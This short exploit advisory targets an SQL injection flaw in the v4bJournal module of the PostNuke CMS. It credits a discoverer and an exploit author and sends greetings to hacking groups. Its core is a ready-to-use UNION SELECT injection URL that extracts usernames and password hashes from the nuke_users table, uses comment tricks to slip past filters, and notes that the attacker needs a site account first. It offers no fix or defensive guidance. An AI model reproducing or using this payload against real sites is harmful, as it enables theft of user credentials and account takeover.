PostNuke Journal
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: [email protected]
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
Contact: [email protected]
index.php?module=v4bJournal&func=journal_comment&id=-1//union//select//0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14//from//nuke_users//where/**/pn_uid=2/*
EX:-
U must regrister first ( You Most Have An Account On Vulnerable Site )